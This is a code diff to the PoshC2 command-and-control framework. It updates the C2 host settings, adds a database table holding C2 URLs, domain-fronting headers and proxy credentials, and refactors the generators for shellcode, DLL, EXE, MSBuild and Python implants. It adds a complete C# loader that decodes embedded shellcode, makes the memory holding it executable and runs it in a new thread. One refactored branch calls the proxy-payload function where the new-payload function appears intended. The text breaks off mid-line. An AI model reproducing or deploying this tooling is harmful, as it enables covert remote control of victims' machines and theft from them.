diff --git a/C2Server.py b/C2Server.py index fc3e864..050b308 100644 --- a/C2Server.py +++ b/C2Server.py @@ -283,6 +283,7 @@ if __name__ == '__main__': C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) + new_urldetails( "default", C2[1], C2[3], "", "", "", "" ) newPayload.CreateRaw() newPayload.CreateDlls() newPayload.CreateShellcode() diff --git a/Config.py b/Config.py index cb8fa4c..6d0a74f 100644 --- a/Config.py +++ b/Config.py @@ -4,8 +4,8 @@ HOST_NAME = '0.0.0.0' PORT_NUMBER = 443 POSHDIR = "/opt/PoshC2_Python/" -ROOTDIR = "/opt/PoshC2-Project/" -HostnameIP = "https://172.16.0.126" +ROOTDIR = "/opt/PoshC2_Project/" +HostnameIP = "https://172.19.131.109" ServerPort = "443" DomainFrontHeader = "" # example df.azureedge.net DefaultSleep = "5" @@ -62,7 +62,7 @@ logo = """__________ .__. _________ ________ | | ( <_> )___ \| Y \ \ \____/ \ |____| \____/____ >___| / \______ /\_______ \ \/ \/ \/ \/ - =============== v4.1 www.PoshC2.co.uk =============""" + =============== v4.2 www.PoshC2.co.uk =============""" # DO NOT CHANGE # diff --git a/DB.py b/DB.py index 54418f3..5800c0a 100644 --- a/DB.py +++ b/DB.py @@ -42,6 +42,17 @@ def initializedb(): RandomURI TEXT, Command TEXT);""" + create_urls = """CREATE TABLE URLs ( + URLID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, + RandomID TEXT, + URL TEXT, + HostHeader TEXT, + ProxyURL TEXT, + ProxyUsername TEXT, + ProxyPassword TEXT, + CredentialExpiry TEXT + );""" + create_creds = """CREATE TABLE Creds ( credsID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, Username TEXT, @@ -88,6 +99,7 @@ def initializedb(): c.execute(create_completedtasks) c.execute(create_tasks) c.execute(create_creds) + c.execute(create_urls) c.execute(create_c2server) c.execute(create_history) conn.commit() @@ -134,6 +146,13 @@ def get_nettasks_all(): else: return None +def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry ): + conn = sqlite3.connect(DB) + conn.text_factory = str + c = conn.cursor() + c.execute("INSERT INTO URLs (RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry) VALUES (?, ?, ?, ?, ?, ?, ?)",(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry)) + conn.commit() + def drop_nettasks(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row @@ -539,6 +558,17 @@ def get_hostinfo(randomuri): else: return None +def get_c2urls(): + conn = sqlite3.connect(DB) + conn.row_factory = sqlite3.Row + c = conn.cursor() + c.execute("SELECT * FROM URLs") + result = c.fetchall() + if result: + return result + else: + return None + def get_autoruns(): conn = sqlite3.connect(DB) conn.row_factory = sqlite3.Row diff --git a/Files/csc.cs b/Files/csc.cs new file mode 100755 index 0000000..5943200 --- /dev/null +++ b/Files/csc.cs @@ -0,0 +1,84 @@ +using System; +using System.Reflection; +using System.Diagnostics; +using System.Configuration.Install; +using System.Runtime.InteropServices; +using System.Threading; + +class Program + { + [Flags()] + public enum AllocationType : uint + { + COMMIT = 0x1000, + RESERVE = 0x2000, + RESET = 0x80000, + LARGE_PAGES = 0x20000000, + PHYSICAL = 0x400000, + TOP_DOWN = 0x100000, + WRITE_WATCH = 0x200000 + } + + public enum Protection + { + PAGE_NOACCESS = 0x01, + PAGE_READONLY = 0x02, + PAGE_READWRITE = 0x04, + PAGE_WRITECOPY = 0x08, + PAGE_EXECUTE = 0x10, + PAGE_EXECUTE_READ = 0x20, + PAGE_EXECUTE_READWRITE = 0x40, + PAGE_EXECUTE_WRITECOPY = 0x80, + PAGE_GUARD = 0x100, + PAGE_NOCACHE = 0x200, + PAGE_WRITECOMBINE = 0x400 + } + + [DllImport("kernel32.dll", SetLastError=true)] + static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect); + + [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] + static extern IntPtr CreateThread( + IntPtr lpThreadAttributes, + uint dwStackSize, + IntPtr lpStartAddress, + IntPtr lpParameter, + uint dwCreationFlags, + out uint lpThreadId); + + [DllImport("kernel32.dll", SetLastError = true)] + static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect); + + static void Main(string[] args) + { + byte[] shell = null; + + string safdsv64 = "#REPLACEME64#"; + string safdsv32 = "#REPLACEME32#"; + + if (IntPtr.Size == 4) + { + // 32-bit + shell = Convert.FromBase64String(safdsv32); + } + else if (IntPtr.Size == 8) + { + // 64-bit + shell = Convert.FromBase64String(safdsv64); + } + + IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE); + + if( mem != IntPtr.Zero ) + { + uint oldProt = 0; + uint threadId = 0; + Marshal.Copy(shell, 0, mem, shell.Length); + VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt); + CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId); + WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset); + wh.WaitOne(); + } + } + +} diff --git a/Help.py b/Help.py index 0aec73e..6da7c68 100644 --- a/Help.py +++ b/Help.py @@ -283,6 +283,8 @@ Server Commands: ===================== tasks opsec +show-urls +list-urls cleartasks show-serverinfo history @@ -305,7 +307,7 @@ posh_help = posh_help1 + posh_help2 + posh_help3 + posh_help4 + posh_help5 + pos # pre help commands -PRECOMMANDS = ['add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell', +PRECOMMANDS = ['list-urls','show-urls', 'add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell', 'show-serverinfo','history','output-to-html','set-clockworksmsapikey','set-clockworksmsnumber','set-defaultbeacon', 'listmodules','pwnself','creds','createnewpayload','createproxypayload','listmodules', 'createdaisypayload','turnoff-notifications','turnon-notifications','tasks','cleartasks',"opsec"] diff --git a/ImplantHandler.py b/ImplantHandler.py index 49c00ee..d730723 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -17,6 +17,80 @@ from Core import * def catch_exit(signum, frame): sys.exit(0) +def createproxypayload(): + proxyuser = raw_input("Proxy User: e.g. Domain\\user ") + proxypass = raw_input("Proxy Password: e.g. Password1 ") + proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") + credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ") + update_item("ProxyURL", "C2Server", proxyurl) + update_item("ProxyUser", "C2Server", proxyuser) + update_item("ProxyPass", "C2Server", proxypass) + C2 = get_c2server_all() + newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], + C2[13], C2[11], "", "", C2[19], C2[20], + C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) + newPayload.CreateRaw("Proxy") + newPayload.CreateDlls("Proxy") + newPayload.CreateShellcode("Proxy") + newPayload.CreateEXE("Proxy") + newPayload.CreateMsbuild("Proxy") + new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire ) + startup("Created new proxy payloads") + +def createdaisypayload(): + name = raw_input("Daisy name: e.g. DC1 ") + domain = raw_input("Domain or URL: https://www.example.com ") + daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ") + daisyport = raw_input("Daisy port: .e.g. 8888 ") + daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ") + daisyhost = get_implantbyid(daisyhostid) + proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" + C2 = get_c2server_all() + newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", + "", proxynone, C2[19], C2[20], + C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) + newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3])) + newPayload.CreateRaw(name) + newPayload.CreateDlls(name) + newPayload.CreateShellcode(name) + newPayload.CreateEXE(name) + newPayload.CreateMsbuild(name) + new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" ) + startup("Created new %s daisy payloads" % name) + +def createnewpayload(): + domain = raw_input("Domain or URL: https://www.example.com ") + domainbase = (domain.lower()).replace('https://','') + domainbase = domainbase.replace('http://','') + domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") + proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") + randomid = randomuri(5) + proxyuser = "" + proxypass = "" + credsexpire = "" + if proxyurl: + proxyuser = raw_input("Proxy User: e.g. Domain\\user ") + proxypass = raw_input("Proxy Password: e.g. Password1 ") + credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ") + imurl = "%s?p" % get_newimplanturl() + domainbase = "Proxy%s%s" % (domainbase,randomid) + else: + domainbase = "%s%s" % (randomid,domainbase) + imurl = get_newimplanturl() + C2 = get_c2server_all() + newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, + proxypass, proxyurl, "", "", C2[19], C2[20], + C2[21], imurl, PayloadsDirectory) + newPayload.CreateRaw("%s_" % domainbase) + newPayload.CreateDlls("%s_" % domainbase) + newPayload.CreateShellcode("%s_" % domainbase) + newPayload.CreateEXE("%s_" % domainbase) + newPayload.CreateMsbuild("%s_" % domainbase) + newPayload.CreatePython("%s_" % domainbase) + new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire ) + startup("Created new payloads") + + def argp(cmd): args = "" try: @@ -163,7 +237,12 @@ def startup(printhelp = ""): graphviz() time.sleep(1) startup() - + if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()): + urls = get_c2urls() + urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n" + for i in urls: + urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7]) + startup(urlformatted) if "add-autorun" in implant_id.lower(): autorun = (implant_id.lower()).replace("add-autorun ","") autorun = autorun.replace("add-autorun","") @@ -266,69 +345,13 @@ def startup(printhelp = ""): sys.exit(0) if "createdaisypayload" in implant_id.lower(): - name = raw_input("Daisy name: e.g. DC1 ") - daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ") - daisyport = raw_input("Daisy port: .e.g. 8888 ") - daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ") - daisyhost = get_implantbyid(daisyhostid) - proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" - - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", - "", proxynone, C2[19], C2[20], - C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) - newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3])) - newPayload.CreateRaw(name) - newPayload.CreateDlls(name) - newPayload.CreateShellcode(name) - newPayload.CreateEXE(name) - newPayload.CreateMsbuild(name) - startup("Created new %s daisy payloads" % name) + createdaisypayload() if "createproxypayload" in implant_id.lower(): - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - update_item("ProxyURL", "C2Server", proxyurl) - update_item("ProxyUser", "C2Server", proxyuser) - update_item("ProxyPass", "C2Server", proxypass) - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], - C2[13], C2[11], "", "", C2[19], C2[20], - C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) - - newPayload.CreateRaw("Proxy") - newPayload.CreateDlls("Proxy") - newPayload.CreateShellcode("Proxy") - newPayload.CreateEXE("Proxy") - newPayload.CreateMsbuild("Proxy") - startup("Created new proxy payloads") + createproxypayload() if "createnewpayload" in implant_id.lower(): - domain = raw_input("Domain or URL: https://www.example.com ") - domainbase = (domain.lower()).replace('https://','') - domainbase = domainbase.replace('http://','') - domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - if proxyurl: - imurl = "%s?p" % get_newimplanturl() - domainbase = "Proxy%s" % domainbase - else: - imurl = get_newimplanturl() - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, - proxypass, proxyurl, "", "", C2[19], C2[20], - C2[21], imurl, PayloadsDirectory) - - newPayload.CreateRaw("%s_" % domainbase) - newPayload.CreateDlls("%s_" % domainbase) - newPayload.CreateShellcode("%s_" % domainbase) - newPayload.CreateEXE("%s_" % domainbase) - newPayload.CreateMsbuild("%s_" % domainbase) - newPayload.CreatePython("%s_" % domainbase) - startup("Created new payloads") + createnewpayload() if (implant_id == "?") or (implant_id == "help"): startup(pre_help) @@ -864,69 +887,14 @@ def runcommand(command, randomuri): new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, randomuri) elif "createdaisypayload" in command.lower(): - name = raw_input("Daisy name: e.g. DC1 ") - daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ") - daisyport = raw_input("Daisy port: .e.g. 8888 ") - daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ") - daisyhost = get_implantbyid(daisyhostid) - proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" - - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", - "", proxynone, C2[19], C2[20], - C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory) - newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3])) - newPayload.CreateRaw(name) - newPayload.CreateDlls(name) - newPayload.CreateShellcode(name) - newPayload.CreateEXE(name) - newPayload.CreateMsbuild(name) - startup("Created new %s daisy payloads" % name) + createdaisypayload() elif "createproxypayload" in command.lower(): - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - update_item("ProxyURL", "C2Server", proxyurl) - update_item("ProxyUser", "C2Server", proxyuser) - update_item("ProxyPass", "C2Server", proxypass) - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], - C2[13], C2[11], "", "", C2[19], C2[20], - C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) - - newPayload.CreateRaw("Proxy") - newPayload.CreateDlls("Proxy") - newPayload.CreateShellcode("Proxy") - newPayload.CreateEXE("Proxy") - newPayload.CreateMsbuild("Proxy") - startup("Created new proxy payloads") + createproxypayload() elif "createnewpayload" in command.lower(): - domain = raw_input("Domain or URL: https://www.example.com ") - domainbase = (domain.lower()).replace('https://','') - domainbase = domainbase.replace('http://','') - domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ") - proxyuser = raw_input("Proxy User: e.g. Domain\\user ") - proxypass = raw_input("Proxy Password: e.g. Password1 ") - proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - if proxyurl: - imurl = "%s?p" % get_newimplanturl() - domainbase = "Proxy%s" % domainbase - else: - imurl = get_newimplanturl() - C2 = get_c2server_all() - newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, - proxypass, proxyurl, "", "", C2[19], C2[20], - C2[21], imurl, PayloadsDirectory) + createproxypayload() - newPayload.CreateRaw("%s_" % domainbase) - newPayload.CreateDlls("%s_" % domainbase) - newPayload.CreateShellcode("%s_" % domainbase) - newPayload.CreateEXE("%s_" % domainbase) - newPayload.CreateMsbuild("%s_" % domainbase) - newPayload.CreatePython("%s_" % domainbase) - startup("Created new payloads") else: if command: new_task(command, randomuri) diff --git a/Payloads.py b/Payloads.py index 09996ce..a05bdf0 100644 --- a/Payloads.py +++ b/Payloads.py @@ -27,13 +27,11 @@ class Payloads(object): self.ConnectURL = ConnectURL self.BaseDirectory = BaseDirectory if os.path.exists("%saes.py" % PayloadsDirectory): - print "FOUND AES" with open("%saes.py" % PayloadsDirectory, 'rb') as f: content = f.read() import re m = re.search('#KEY(.+?)#KEY', content); if m: keyfound = m.group(1) - print keyfound self.PythonHash = hashlib.sha512(content).hexdigest() self.PythonKey = keyfound else: @@ -498,6 +496,17 @@ End Sub x86base64 = base64.b64encode(b86.read()) with open(x64filename, "rb") as b64: x64base64 = base64.b64encode(b64.read()) + with open("%scsc.cs" % FilesDirectory, 'rb') as f: + content = f.read() + ccode = content.replace("#REPLACEME32#",x86base64) + ccode = ccode.replace("#REPLACEME64#",x64base64) + filename = "%scsc.cs" % (self.BaseDirectory) + output_file = open(filename, 'w') + output_file.write(ccode) + output_file.close() + self.QuickstartLog( "" ) + self.QuickstartLog( "CSC file written to: %s%scsc.cs" % (self.BaseDirectory,name) ) + projname = randomuri() msbuild="""